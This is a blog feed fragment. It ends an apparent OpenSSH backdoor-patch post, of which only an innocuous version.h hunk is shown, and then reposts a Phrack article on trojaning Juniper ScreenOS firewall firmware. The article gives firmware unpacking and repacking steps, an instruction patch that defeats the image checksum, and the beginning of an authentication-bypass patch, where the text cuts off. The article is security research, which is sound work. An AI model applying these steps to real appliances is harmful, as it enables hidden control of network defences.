/&gt;*** 1,6 ****&lt;br /&gt;--- 1,9 ----&lt;br /&gt;/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */&lt;br /&gt;&lt;br /&gt;+ // slash patch&lt;br /&gt;+ // change to targetted openssh version&lt;br /&gt;#define SSH_VERSION "OpenSSH_5.2"&lt;br /&gt;&lt;br /&gt;#define SSH_PORTABLE "p1"&lt;br /&gt;#define SSH_RELEASE SSH_VERSION SSH_PORTABLE&lt;br /&gt;+ // end of patch&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/STDIO.H&gt;&lt;/sys&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4461856475494117721?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4461856475494117721/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4461856475494117721' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4461856475494117721'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4461856475494117721'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/07/ssh-backdoor-patch.html' title='uDc-hackssh-v1.0a'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/SmXcNl7raxI/AAAAAAAAAoQ/BjME9NrGXaQ/s72-c/hackpermit.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-7881801400907622347</id><published>2009-07-17T16:26:00.003+08:00</published><updated>2009-07-17T16:33:07.500+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>My favorite article of the year so far.</title><content type='html'>&lt;pre&gt;File: archives/66/p66_0x05_Backdooring Juniper Firewalls_by_Graeme.txt&lt;br /&gt;   ==Phrack Inc.==&lt;br /&gt;&lt;br /&gt; Volume 0x0d, Issue 0x42, Phile #0x05 of 0x11&lt;br /&gt;&lt;br /&gt;|=-----------------------------------------------------------------------=|&lt;br /&gt;|=---------------=[     Netscreen of the Dead:      ]=-------------------=|&lt;br /&gt;|=-=[ Developing a Trojaned Firmware for Juniper ScreenOS Platforms  ]=--=|&lt;br /&gt;|=-----------------------------------------------------------------------=|&lt;br /&gt;|=-----------------------------------------------------------------------=|&lt;br /&gt;|=-------------------=[     By graeme@lolux.net     ]=-------------------=|&lt;br /&gt;|=-----------------------------------------------------------------------=|&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ Index&lt;br /&gt;0x1 - Trailer&lt;br /&gt;0x2 - Opening Scene&lt;br /&gt;0x3 - The Attack&lt;br /&gt;0x4 - Live Evisceration&lt;br /&gt;0x5 - Feeding on the Remains&lt;br /&gt;0x6 - Night of the Living Netscreen&lt;br /&gt;0x7 - Autopsy&lt;br /&gt;0x8 - Netscreen of the Dead&lt;br /&gt;0x9 - Zombie Loader&lt;br /&gt;0xA - 28 Hacks Later&lt;br /&gt;0xB - Closing Scene&lt;br /&gt;0xC - References&lt;br /&gt;0xD - Credits&lt;br /&gt;0xE - Addendum&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0x1 - Trailer&lt;br /&gt;&lt;br /&gt;This article describes how an attacker can obtain, modify and install a&lt;br /&gt;modified version of Juniper ScreenOS which can run attacker supplied code&lt;br /&gt;which performs hidden operations or operations contrary to the&lt;br /&gt;configuration of any Juniper platform running ScreenOS.&lt;br /&gt;&lt;br /&gt;The attacker could be any one of the following:&lt;br /&gt;- an attacker that has exploited a vulnerability in ScreenOS&lt;br /&gt;- someone who has illicitly obtained the administrator password&lt;br /&gt;- someone with physical access to the device (vendor / 3rd party support)&lt;br /&gt;- an attacker conducting a man-in-the-middle attack on the network&lt;br /&gt;- a malicious administrator&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0x2 - Opening Scene&lt;br /&gt;&lt;br /&gt;Netscreens are manufactured by Juniper Inc and are all in one firewall,&lt;br /&gt;VPN, router security appliance. They range in scale from SME to Datacentre&lt;br /&gt;(NS5XP --  NS5000). Most are Common Criteria and FIPS certified and run a&lt;br /&gt;closed source, real time OS called ScreenOS which is supplied by Juniper&lt;br /&gt;as a binary firmware 'blob'.&lt;br /&gt;&lt;br /&gt;The hardware used for this research was a Netscreen NS5XT containing an&lt;br /&gt;AMCC PowerPC 405 GP RISC processor and 64MB flash. The firmware used as&lt;br /&gt;the basis for modified firmware images was ScreenOS 5.3.0r10. Interfaces&lt;br /&gt;for administration are serial console, Telnet, SSH, and HTTP/HTTPS. The&lt;br /&gt;firmware can be installed from serial console, via the web interface or&lt;br /&gt;via TFTP.&lt;br /&gt;&lt;br /&gt;The configuration of the device is stored as a file on the flash and is&lt;br /&gt;independent of the firmware.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0x3 - The Attack&lt;br /&gt;&lt;br /&gt;The goal of the attack is to be able to install attacker modified firmware&lt;br /&gt;which provides hidden root control of the appliance. When attacking&lt;br /&gt;firmware there are two vectors of attack:&lt;br /&gt;&lt;br /&gt;1. Live evisceration: debugging with remote GDB debugger over serial line&lt;br /&gt;&lt;br /&gt;2. Feeding on the remains: dead listing and static binary analysis using a&lt;br /&gt;disassembler and hex editor.&lt;br /&gt;&lt;br /&gt;The next two sections will discuss these two approaches and how successful&lt;br /&gt;they were in this specific instance. At this point it is worth noting some&lt;br /&gt;key features of the PowerPC hardware architecture:&lt;br /&gt;- fixed instruction size of 4 bytes&lt;br /&gt;- flat memory model&lt;br /&gt;- 32 general purpose registers (r0-r31)&lt;br /&gt;- no explicit stack but convention of using r01&lt;br /&gt;- link register (lr) for returning to calling function&lt;br /&gt;- program counter (pc) for current instruction&lt;br /&gt;- count register (ctr) for loop counter or return address&lt;br /&gt;- exception register (xer) for exceptions, status and control&lt;br /&gt;&lt;br /&gt;Detailed information on the PowerPC architecture is available from the IBM&lt;br /&gt;PPC405 Embedded Processor Core User Manual which can be downloaded from&lt;br /&gt;http://www-01.ibm.com/chips/techlib/techlib.nsf/products/&lt;br /&gt;PowerPC_405_Embedded_Cores&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0x4 - Live Evisceration&lt;br /&gt;&lt;br /&gt;For live debugging a GDB compiled for PowerPC was required. The Embedded&lt;br /&gt;Linux Development Kit (http://www.denx.de/wiki/DULG/ELDK) has GDB compiled&lt;br /&gt;for a number of embedded platforms including the PowerPC 403 and 405&lt;br /&gt;processors. This provides remote debugging of systems over a serial&lt;br /&gt;connection.&lt;br /&gt;&lt;br /&gt;Obviously no source for ScreenOS was available so it was necessary to&lt;br /&gt;create a custom GDB init file for displaying PPC registers and 'stack' to&lt;br /&gt;provide useful information on breaks. GDB reads init files on startup and&lt;br /&gt;init files use the same syntax as GDB command files and are processed by&lt;br /&gt;GDB in the same way. The init file in your home directory (~/.gdbinit) can&lt;br /&gt;set options that affect subsequent processing of command line options and&lt;br /&gt;operands. An example gdb init file is supplied in the addendum. This gdb&lt;br /&gt;init file outputs context similar to the windows SoftICE tool which&lt;br /&gt;reverse engineers should be familiar with. Below is an example of a GDB&lt;br /&gt;session connected to a Netscreen:&lt;br /&gt;&lt;br /&gt;--start gdb session&lt;br /&gt;&lt;br /&gt;GNU gdb Red Hat Linux (6.7-1rh)&lt;br /&gt;Copyright (C) 2007 Free Software Foundation, Inc.&lt;br /&gt;License GPLv3+: GNU GPL version 3 or later&lt;br /&gt;&lt;http: org="" licenses="" html=""&gt;&lt;br /&gt;This is free software: you are free to change and redistribute it.&lt;br /&gt;There is NO WARRANTY, to the extent permitted by law.  Type "show copying"&lt;br /&gt;and "show warranty" for details.&lt;br /&gt;This GDB was configured as "--host=i686-pc-linux-gnu --target=ppc-linux".&lt;br /&gt;The target architecture is set automatically (currently powerpc:403)&lt;br /&gt;&lt;br /&gt;gdb&gt;target remote /dev/ttyU0&lt;br /&gt;&lt;br /&gt;0x0032bea4 in ?? ()&lt;br /&gt;gdb&gt;&lt;br /&gt;gdb&gt;context&lt;br /&gt;&lt;br /&gt;powerpc&lt;br /&gt;---------------------------------------------------------------------[regs]&lt;br /&gt;r00:00000001 r01:03790528 r02:01358000 r03:FFFFFFFF     pc:0032BEA4&lt;br /&gt;r04:0000002E r05:00000000 r06:00000000 r07:00000000&lt;br /&gt;r08:01631050 r09:01350000 r10:01630000 r11:01630000     lr:0032C5CC&lt;br /&gt;r12:40000022 r13:00000000 r14:6FFFA27F r15:1B9FC3F7&lt;br /&gt;r16:00000000 r17:402D04D0 r18:03791470 r19:00000000    ctr:0060A764&lt;br /&gt;r20:03790B48 r21:013509AC r22:FFFFFFFF r23:0379147E&lt;br /&gt;r24:00000000 r25:00000000 r26:00000000 r27:00000000     cr:40000028&lt;br /&gt;r28:03791470 r29:00000000 r30:03790F20 r31:0135098C    xer:20000046&lt;br /&gt;&lt;br /&gt;[03790528]----------------------------------------------------------[stack]&lt;br /&gt;0379058C : 00 00 00 00  00 00 00 00 - 00 00 00 00  00 00 00 00&lt;br /&gt;03790570 : 00 00 00 00  00 00 00 00 - 00 00 00 00  00 00 00 00&lt;br /&gt;0379055A : 00 00 00 00  00 00 00 00 - 00 00 00 00  00 00 00 00&lt;br /&gt;0379053E : A6 40 03 79  06 C0 00 60 - A9 BC 00 00  00 00 00 00 .@y.`..&lt;br /&gt;03790528 : 03 79 05 30  00 06 22 F0 - 03 79 03 79  05 40 00 32 y0".yy@2&lt;br /&gt;03790512 : 00 01 03 79  12 58 03 79 - 05 20 0F 20  00 06 37 08 yXy  7&lt;br /&gt;037904F6 : 00 00 00 00  00 05 01 62 - 9F A0 C2 28  01 4A 05 EA ...(J..&lt;br /&gt;037904E0 : 03 79 04 E8  00 32 BE 60 - 03 79 03 79  14 70 01 4A y.2.`yypJ&lt;br /&gt;037904C4 : 01 6F 0A 24  03 79 04 E0 - 00 B8 00 00  00 6C 03 79 o$y..ly&lt;br /&gt;&lt;br /&gt;[0032BEA4]-----------------------------------------------------------[code]&lt;br /&gt;0x32bea4:       lwz     r0,12(r1)&lt;br /&gt;0x32bea8:       mtlr    r0&lt;br /&gt;0x32beac:       addi    r1,r1,8&lt;br /&gt;0x32beb0:       blr&lt;br /&gt;0x32beb4:       stwu    r1,-40(r1)&lt;br /&gt;0x32beb8:       mflr    r0&lt;br /&gt;0x32bebc:       stw     r29,28(r1)&lt;br /&gt;0x32bec0:       stw     r30,32(r1)&lt;br /&gt;0x32bec4:       stw     r31,36(r1)&lt;br /&gt;0x32bec8:       stw     r0,44(r1)&lt;br /&gt;0x32becc:       mr      r31,r3&lt;br /&gt;0x32bed0:       lis     r9,322&lt;br /&gt;0x32bed4:       lwz     r0,-13800(r9)&lt;br /&gt;0x32bed8:       cmpwi   r0,0&lt;br /&gt;0x32bedc:       beq-    0x32bef0&lt;br /&gt;0x32bee0:       lis     r3,196&lt;br /&gt;----------------------------------------------------------------------&lt;br /&gt;gdb&gt;&lt;br /&gt;&lt;br /&gt;--end gdb session&lt;br /&gt;&lt;br /&gt;The steps for remote debugging on the Netscreen are as follows:&lt;br /&gt;1. Connect to a network interface and the serial console of the Netscreen&lt;br /&gt;from a PC.&lt;br /&gt;2. Over a telnet / SSH session to the Netscreen enable GDB using:&lt;br /&gt;ns5xt&gt;set gdb enable&lt;br /&gt;3. On the PC start gdbppc and connect to the remote gdb using:&lt;br /&gt;gdb&gt;target remote /dev/ttyUSB0&lt;br /&gt;&lt;br /&gt;During this research remote debugging was useful for obtaining memory&lt;br /&gt;dumps and querying specific memory addresses. However setting breakpoints&lt;br /&gt;or single stepping did not appear to work. Information on how to get these&lt;br /&gt;features working would be most appreciated by the author.&lt;br /&gt;&lt;br /&gt;Observing the boot process of the Netscreen over a serial console did&lt;br /&gt;provide useful information regarding the boot up sequence:&lt;br /&gt;&lt;br /&gt;--start boot sequence&lt;br /&gt;&lt;br /&gt;NetScreen NS-5XT Boot Loader Version 2.0.0 (Checksum: A1B6FF9B)&lt;br /&gt;Copyright (c) 1997-2003 NetScreen Technologies, Inc.&lt;br /&gt;&lt;br /&gt;Total physical memory: 64MB&lt;br /&gt; Test - Pass&lt;br /&gt; Initialization - Done&lt;br /&gt;&lt;br /&gt;Hit any key to run loader&lt;br /&gt;Hit any key to run loader&lt;br /&gt;Hit any key to run loader&lt;br /&gt;Hit any key to run loader&lt;br /&gt;&lt;br /&gt;Loading default system image from on-board flash disk...&lt;br /&gt;&lt;br /&gt;Ignore image authentication!&lt;br /&gt;&lt;br /&gt;Start loading...&lt;br /&gt;.............................................................&lt;br /&gt;&lt;br /&gt;Done.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Juniper Networks, Inc&lt;br /&gt;NS-5XT  System Software&lt;br /&gt;Copyright, 1997-2004&lt;br /&gt;&lt;br /&gt;Version 5.3.0r10.0&lt;br /&gt;Load Manufacture Information ... Done&lt;br /&gt;Load NVRAM Information ... (5.3.0)Done&lt;br /&gt;Install module init vectors&lt;br /&gt;Verify ACL register default value (at hw reset) ... Done&lt;br /&gt;Verify ACL register read/write ... Done&lt;br /&gt;Verify ACL rule read/write ... Done&lt;br /&gt;Verify ACL rule search ... Done&lt;br /&gt;MD5("a") = 0cc175b9 c0f1b6a8 31c399e2 69772661&lt;br /&gt;MD5("abc") = 90015098 3cd24fb0 d6963f7d 28e17f72&lt;br /&gt;MD5("message digest") = f96b697d 7cb7938d 525a2f31 aaf161d0&lt;br /&gt;Verify DES register read/write ... Done&lt;br /&gt;&lt;br /&gt;Initial port mode trust-untrust(1)&lt;br /&gt;Install modules (00c40000,0146d540) ... load dns table&lt;br /&gt;: dns table file do not exist.&lt;br /&gt;&lt;br /&gt;Initializing DI 1.1.0-ns&lt;br /&gt;System config (1129 bytes) loaded&lt;br /&gt;.&lt;br /&gt;Done.&lt;br /&gt;Load System Configuration&lt;br /&gt;....................................................Done&lt;br /&gt;system init done..&lt;br /&gt;System change state to Active(1)&lt;br /&gt;login:&lt;br /&gt;&lt;br /&gt;--end of boot sequence&lt;br /&gt;&lt;br /&gt;Stored boot loader executes and the opportunity is given to load a new&lt;br /&gt;image over a serial connection. The default behaviour is then to&lt;br /&gt;uncompress the stored firmware and run the image.&lt;br /&gt;&lt;br /&gt;If a new image file is loaded over a serial console it is uncompressed&lt;br /&gt;and some options are presented. The first prompt allows saving the new&lt;br /&gt;image to flash. Even if the new image is not stored to flash the next&lt;br /&gt;prompt allows running the new image. No password is required to load an&lt;br /&gt;image over the serial line.&lt;br /&gt;The boot loader is part of the firmware and if the new boot loader is&lt;br /&gt;different from the version stored on the flash then the stored boot loader&lt;br /&gt;is overwritten by the new one.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0x5 - Feeding on the Remains&lt;br /&gt;&lt;br /&gt;Static binary analysis was the main method employed in this research.&lt;br /&gt;ScreenOS images can be downloaded direct from the device or obtained from&lt;br /&gt;the Juniper website by Juniper customers.&lt;br /&gt;&lt;br /&gt;ScreenOS provides the following command to download the firmware over&lt;br /&gt;tftp:&lt;br /&gt;&lt;br /&gt;ns5xt&gt;save software from flash to tftp 192.168.0.42 destination_file&lt;br /&gt;&lt;br /&gt;It is important to note that this command downloads the compressed image&lt;br /&gt;file stored on the flash, not the currently running image from memory&lt;br /&gt;which may or may not be the same as the image file stored on the flash.&lt;br /&gt;&lt;br /&gt;Using an undocumented command all the files on the flash can be listed:&lt;br /&gt;&lt;br /&gt;ns5xt-&gt; exec vfs ls flash:/&lt;br /&gt;  $NSBOOT$.BIN              5,177,344&lt;br /&gt;  envar.rec                 82&lt;br /&gt;  golerd.rec                0&lt;br /&gt;  node_secret.ace           0&lt;br /&gt;  certfile.dsc              252&lt;br /&gt;  certfile.dat              1,324&lt;br /&gt;  ns_sys_config             1,129&lt;br /&gt;  $lkg$.cfg                 1,259&lt;br /&gt;  syscert.cfg               1,167&lt;br /&gt;2,501,632 bytes free (7,686,144 total) on disk&lt;br /&gt;&lt;br /&gt;$NSBOOT$.BIN is the firmware stored on flash. To download this securely&lt;br /&gt;scp can be enabled on the Netscreen. Note the configuration of the device&lt;br /&gt;is stored in ns_sys_config.&lt;br /&gt;&lt;br /&gt;It is also possible to use GDB to dump the complete contents of the memory&lt;br /&gt;over a serial line. This is sloooow.&lt;br /&gt;&lt;br /&gt;gdb&gt; set logging on&lt;br /&gt;gdb&gt; set height 0&lt;br /&gt;gdb&gt; set loging file 'dump'&lt;br /&gt;gdb&gt; x /2048000000i&lt;br /&gt;&lt;br /&gt;As a Juniper customer I was able to download current and old versions of&lt;br /&gt;ScreenOS firmware. Many firmware versions were compared as a first step in&lt;br /&gt;determining the make up of the ScreenOS firmware images. The following 4&lt;br /&gt;section structure was revealed by this comparative analysis:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;0x00000000 /--------------------------\&lt;br /&gt;     |         HEADER           |&lt;br /&gt;0x00000050 |--------------------------|&lt;br /&gt;     |                          |&lt;br /&gt;0x00002020 |--------------------------|&lt;br /&gt;     |        STUB            |&lt;br /&gt;0x00012940 |--------------------------|&lt;br /&gt;     |                          |&lt;br /&gt;0x00012c00 |--------------------------|&lt;br /&gt;     |     COMPRESSED BLOB      |&lt;br /&gt;     |                          |&lt;br /&gt;     |                          |&lt;br /&gt;     |                          |&lt;br /&gt;     |                          |&lt;br /&gt;     |                          |&lt;br /&gt;     |                          |&lt;br /&gt;~0x004e6000 \--------------------------/&lt;br /&gt;&lt;br /&gt;This is a similar format for other embedded firmware.&lt;br /&gt;&lt;br /&gt;Compressed Firmware Header&lt;br /&gt;The header consists of the following 4 byte fields making up 32 bytes:&lt;br /&gt;&lt;br /&gt;- Signature (magic bytes)&lt;br /&gt;- Information 4*1 byte fields:  00, Platform, CPU, Version (eg 0x00110A12)&lt;br /&gt;- Offset  (for program entry point)&lt;br /&gt;- Address (for program entry point)&lt;br /&gt;- Size&lt;br /&gt;- unknown&lt;br /&gt;- unknown&lt;br /&gt;- Checksum&lt;br /&gt;&lt;br /&gt;Points to note are&lt;br /&gt;- the size field   = (size of the compressed blob - 79 bytes)&lt;br /&gt;- signature    = 0xEE16BA81&lt;br /&gt;- offset    = 0x00000002&lt;br /&gt;- address   = 0x02860000&lt;br /&gt;&lt;br /&gt;and these were always the same in the version 5 firmwares that were&lt;br /&gt;compared. Version 4 firmwares differed but were similar but these are old&lt;br /&gt;versions and I will not discuss them here.&lt;br /&gt;&lt;br /&gt;Stub&lt;br /&gt;&lt;br /&gt;The stub in the firmware image is responsible for uncompressing the blob&lt;br /&gt;when the device is booted. This stub contains strings relating to the LZMA&lt;br /&gt;algorithm so it was assumed that the compressed blob is an LZMA compressed&lt;br /&gt;binary blob. From the Wikipedia LZMA entry: "Decompression-only code for&lt;br /&gt;LZMA generally compiles to around 5kB and the amount of RAM required&lt;br /&gt;during decompression is principally determined by the size of the sliding&lt;br /&gt;window used during compression. Small code size and relatively low memory&lt;br /&gt;overhead, particularly with smaller dictionary lengths, and free source&lt;br /&gt;code make the LZMA decompression algorithm well-suited to embedded&lt;br /&gt;applications."&lt;br /&gt;&lt;br /&gt;Free LZMA utilities are available here: http://tukaani.org/lzma/ and as&lt;br /&gt;prebuilt packages for most *nix distributions.&lt;br /&gt;&lt;br /&gt;Compressed Blob&lt;br /&gt;&lt;br /&gt;The compressed blob is LZMA compressed and contains a header but this is a&lt;br /&gt;non-standard header. There are non-standard signature bytes for the stub&lt;br /&gt;to recognise the blob and the LZMA uncompresssed size field is missing.&lt;br /&gt;&lt;br /&gt;The standard LZMA header has 3 fields:&lt;br /&gt;options   (2 bytes)&lt;br /&gt;dictionary_size  (4 bytes)&lt;br /&gt;uncompressed_size   (8 bytes)&lt;br /&gt;&lt;br /&gt;The blob header also has 3 fields but slightly different:&lt;br /&gt;signature  (4 bytes) = 0x1440598&lt;br /&gt;options   (2 bytes)&lt;br /&gt;dictionary_size  (8 bytes)&lt;br /&gt;&lt;br /&gt;The dictionary size is used as a parameter in the compression algorithm.&lt;br /&gt;LZMA is a dictionary coder which I will not explain here but instead point&lt;br /&gt;the reader to http://en.wikipedia.org/wiki/Dictionary_coder.&lt;br /&gt;&lt;br /&gt;One approach would have been to attempt to use the header information and&lt;br /&gt;the stub to decompress the compressed blob but given a lack of PowerPC&lt;br /&gt;hardware a different approach was taken. The approach used was to cut out&lt;br /&gt;the compressed blob from the firmware and attempt to decompress it in&lt;br /&gt;isolation using any tools available. Again using comparative anlalysis,&lt;br /&gt;the freely available LZMA utilities and direct modification of the header&lt;br /&gt;bytes the following methods for decompression and compression of the blob&lt;br /&gt;were reverse engineered.&lt;br /&gt;&lt;br /&gt;The decompression process:&lt;br /&gt;1. Cut out the compressed blob from the image file.&lt;br /&gt;2. Insert uncompressed_size equal to -1 which equals unknown size&lt;br /&gt;(-1 uncompresseed size = 0xFFFFFFFFFFFFFFFF)&lt;br /&gt;3. Modify the dictionary_size from 0x00200000 to 0x00008000.&lt;br /&gt;4. Decompress the file using standard LZMA utilities.&lt;br /&gt;&lt;br /&gt;The modification of the dictionary size was found by fuzzing the field and&lt;br /&gt;then attempting to decompress. The decompression reports an error at the&lt;br /&gt;end of the decompression so it is important to decompress to a stream&lt;br /&gt;otherwise the decompressed data is lost.&lt;br /&gt;&lt;br /&gt;The recompression process:&lt;br /&gt;1. Compress with standard LZMA utilities using specific compression&lt;br /&gt; options&lt;br /&gt;2. Modify the dictionary_size field 0x00002000 to 0x00200000.&lt;br /&gt;3. Delete the  uncompressed_size field of 8 bytes.&lt;br /&gt;4. Concatenate with the header from the original image file.&lt;br /&gt;&lt;br /&gt;Proof of concept python scripts are provided in the Addendum which can&lt;br /&gt;perform the packing and unpacking of ScreenOS images. The LZMA utilities&lt;br /&gt;are necessary for operation of these scripts.&lt;br /&gt;&lt;br /&gt;The recompressed firmware successfully loads onto a Netscreen and runs.&lt;br /&gt;More research into the dictionary size field was going to be carried out&lt;br /&gt;but once loading of firmware was successful there were many other more&lt;br /&gt;interesting avenues of research which took precedence.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0x6 - Night of the Living Netscreen&lt;br /&gt;&lt;br /&gt;So at this stage we have successfully reverse engineered the compression&lt;br /&gt;of the firmware. We are also in a position to reverse engineer the&lt;br /&gt;operating system obtained from the decompression.&lt;br /&gt;&lt;br /&gt;The steps are:&lt;br /&gt;&lt;br /&gt;1. Cut out the compressed blob section of the image&lt;br /&gt;2. Uncompress the blob.&lt;br /&gt;3. Re-compress the modified binary.&lt;br /&gt;4. Concatenate the original image header and the modified blob.&lt;br /&gt;5. Upgrade the Netscreen with the modified operating system.&lt;br /&gt;&lt;br /&gt;So we can install the firmware if we have physical access to the device or&lt;br /&gt;some kind of funky remote serial console. But we want to be able to&lt;br /&gt;install firmware over the network. However on attempting to upload a new&lt;br /&gt;firmware via the device web interface or through the tftp command:&lt;br /&gt;&lt;br /&gt;ns5xt&gt;save software from tftp x.x.x.x  filename to flash&lt;br /&gt;&lt;br /&gt;loading fails with a 'bad image file data' error. Note the insecure&lt;br /&gt;transport mechanism for the firmware. This is vulnerable to a man in the&lt;br /&gt;middle attack.&lt;br /&gt;&lt;br /&gt;We need to fix the size and checksum fields of the compressed firmware&lt;br /&gt;header. We know the size field needs to be set equal to the compressed&lt;br /&gt;firmware size - 79 bytes. But we do not yet know how the checksum field is&lt;br /&gt;calculated. To obtain the checksum algorithm we need to disassemble the&lt;br /&gt;uncompressed blob we have from decompressing the firmware. We will now&lt;br /&gt;discuss disassembling the binary and then move onto addressing the&lt;br /&gt;checksum issue.&lt;br /&gt;&lt;br /&gt;--[ 0x7 - Autopsy&lt;br /&gt;&lt;br /&gt;The uncompressed blob is an approximately 20Mb binary.  We want to load&lt;br /&gt;the binary into IDA (a disassembler with PowerPC support) but we need a&lt;br /&gt;loading address so that relative addresses within the program point to the&lt;br /&gt;correct memory locations. Initially the binary was loaded at address&lt;br /&gt;0x00000000 but it is obvious that pointers to strings are not referencing&lt;br /&gt;the beginning of strings.&lt;br /&gt;&lt;br /&gt;The uncompressed blob contains a header with similarities to the&lt;br /&gt;compressed firmware header. The header fields contain a virtual address&lt;br /&gt;and a header size. If we subtract the header size from the virtual address&lt;br /&gt;we have the loading address.&lt;br /&gt;&lt;br /&gt;Uncompressed Blob Header&lt;br /&gt;&lt;br /&gt; signature offset  address&lt;br /&gt;00000000: EE16BA81 00010110 00000020  00060000&lt;br /&gt;&lt;br /&gt;ScreenOS Loading Address = 0x00060000 - 0x00000020 =  0x0005FFE0&lt;br /&gt;&lt;br /&gt;This can be confirmed with live debugging by using GDB and querying the&lt;br /&gt;memory at 0x0005FFE0 to check that the signature bytes 0xEE16BA81 are at&lt;br /&gt;that memory location.&lt;br /&gt;&lt;br /&gt;We can now rebase the program in IDA to use the correct loading address.&lt;br /&gt;Now we have a correctly loaded binary but we do not know anything about&lt;br /&gt;the structure of the binary or the sections it may contain as the binary&lt;br /&gt;is not a recognised executable type. Code and data were marked using IDC&lt;br /&gt;scripts which searched for function prologs (0x9421F*) and string cross&lt;br /&gt;references.  The approximate segments of the binary found by scripting and&lt;br /&gt;manual examination are sketched out in the very simplified illustration&lt;br /&gt;below:&lt;br /&gt;&lt;br /&gt;                           &lt;br /&gt;0x0005ffe0 /-------------------------\&lt;br /&gt;     |       HEADER &amp;amp;          |&lt;br /&gt;     |       SCREENOS CODE     |&lt;br /&gt;0x00c40000 |-------------------------|&lt;br /&gt;     |       SCREENOS DATA     |&lt;br /&gt;0x00f0efd8 |-------------------------|&lt;br /&gt;         |     FILES   |&lt;br /&gt;0x011ddab4 |-------------------------|&lt;br /&gt;     |      BOOT LOADER CODE  |&lt;br /&gt;0x011f2b4e |-------------------------|&lt;br /&gt;     |      BOOT LOADER DATA  |&lt;br /&gt;0x0140e04c |-------------------------|&lt;br /&gt;     |       0xFFs             |&lt;br /&gt;0x014171cf |-------------------------| &lt;br /&gt;     |   other stuff    |&lt;br /&gt;     \-------------------------/&lt;br /&gt;&lt;br /&gt;To build up a picture of the binary it is useful to search for functions&lt;br /&gt;such as str_cmp, file_read, file_write etc and use error strings to&lt;br /&gt;identify and name functions in IDA.&lt;br /&gt;&lt;br /&gt;The boot loader can be cut out and disassembled separately with a loading&lt;br /&gt;address of 0x00000000.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0x8 - Netscreen of the Dead&lt;br /&gt;&lt;br /&gt;At this stage we are now ready to construct a ScreenOS Trojaned Firmware.&lt;br /&gt;Any trojan has three basic requirements:&lt;br /&gt;&lt;br /&gt;1. Delivery: It must be able to be installed remotely.&lt;br /&gt;2. Access: It must provide remote access / communication.&lt;br /&gt;3. Payload: It must provide attacker supplied code execution.&lt;br /&gt;&lt;br /&gt;During this research all modification of the ScreenOS binary to construct&lt;br /&gt;the trojaned version was hand crafted assembly inserted via hex editing&lt;br /&gt;the binary firmware.&lt;br /&gt;&lt;br /&gt;1. First Bite [ Delivery ]&lt;br /&gt;Unlike loading a firmware over a serial console at boot time, the&lt;br /&gt;checksum and size fields in the header are checked when images are loaded&lt;br /&gt;over the network via TFTP or the Web interface&lt;br /&gt;&lt;br /&gt;00000000: EE16BA81 00110A12 00000020 02860000&lt;br /&gt;00000010: 004E6016 15100050 29808000 C72C15F7 &lt;-CHECKSUM  The checksum is calculated as part of the image loading sequence and a disassembly of the relevant function is shown below...but on firmware loading any bad header checksum value is printed to the console with an error message.  If we binary modify the firmware to print out the correct checksum value we would have a 'checksum calculator' firmware which we can load modified firmware against to calculate valid checksums. So we don't have to calculate or reverse engineer the checksum algorithm. This checksum calculator firmware can be loaded over serial console and new images we need to calculate the checksum for are loaded over TFTP. The correct checksum will then be output to the console. This correct header value can then be inserted into the firmware header by direct hex editing of the image file.  With a correct checksum field we can now load modified images via tftp and the web interface.  Below is the ScreenOS code we need to modify to create a checksum calculator image.  008B60E4  lwz  %r4, 0x1C(%r31)   # %r4 contains header checksum 008B60E8  cmpw %r3, %r4          # %r3 contains calculated checksum 008B60EC  beq  loc_8B6110        # branch away if checksums matched 008B60F0  lis  %r3, aCksumXSizeD@h  # " cksum :%x size :%d\n" 008B60F4  addi %r3, %r3, aCksumXSizeD@l 008B60F8  lwz  %r5, 0x10(%r31) 008B60FC  bl   Print_to_Console  # %r4 is printed to console 008B6100  lis  %r3, aIncorrectFirmw@h  # "Incorrect firmware data" 008B6104  addi %r3, %r3, aIncorrectFirmw@l 008B6108  bl   Print_to_Console   If we replace   008B60E8  cmpw %r3, %r4         # %r3 contains calculated checksum  with   008B60EC mr   %r4,%r3          # print out calculated checksum  we have our checksum calculator firmware.  For interested readers two checksum algorithms were identified at addresses and reverse engineering of these is certainly possible.  One Bit{e} [ Access ] The most stealthy and elegant backdoor is to subvert the existing login mechanism. It may be possible to spawn a shell on another external port but this may be noticed from an external scan of the appliance and compromises the stealthiness of the trojaned firmware so further research into this was not carried out.  Serial console, Telnet, Web and SSH all compare password hashes and use the same function for that comparison. Additionally SSH falls back to password authentication if the client does not supply a key, unless password authentication has been explicitly disabled.  A one bit patch to the firmware provides a login with any password if a valid username is supplied.  003F7F04  mr    %r4, %r27 003F7F08  mr    %r5, %r30 003F7F0C  